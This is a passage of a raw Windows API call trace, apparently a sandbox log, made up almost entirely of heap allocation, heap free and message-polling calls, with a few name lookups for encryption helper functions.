(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0115.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6953) returned 0x451c970 [0115.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0115.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0115.131] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0115.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0115.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6953) returned 0x4516010 [0115.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0115.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0115.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0115.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.132] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0115.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0115.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0115.132] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0115.132] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0115.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0115.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2870 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6953) returned 0x4516010 [0115.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27d0 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0115.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2880 [0115.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0115.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0115.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6953) returned 0x45232d0 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0115.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0115.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0115.133] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0115.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0115.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0115.134] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0115.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0115.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0115.134] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0115.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0115.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28b0 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0115.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0115.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0115.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0115.135] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0115.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0115.135] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0115.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0115.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0115.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0115.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0115.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0115.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0115.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0115.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0115.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0115.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.136] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0115.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0115.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0115.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0115.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0115.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0115.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0115.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0115.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0115.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0115.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0115.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0115.136] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0115.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0115.137] PeekMessageW (in: lpMsg=0x144dd94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dd94) returned 0 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0115.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0115.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0115.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0115.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0115.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0115.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0115.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0115.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0115.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0115.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0115.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0115.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0115.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0115.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0115.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0115.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0115.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0115.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0115.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0115.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0115.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0115.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0115.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0115.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0115.139] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0115.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0115.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0115.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0115.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0115.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0115.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 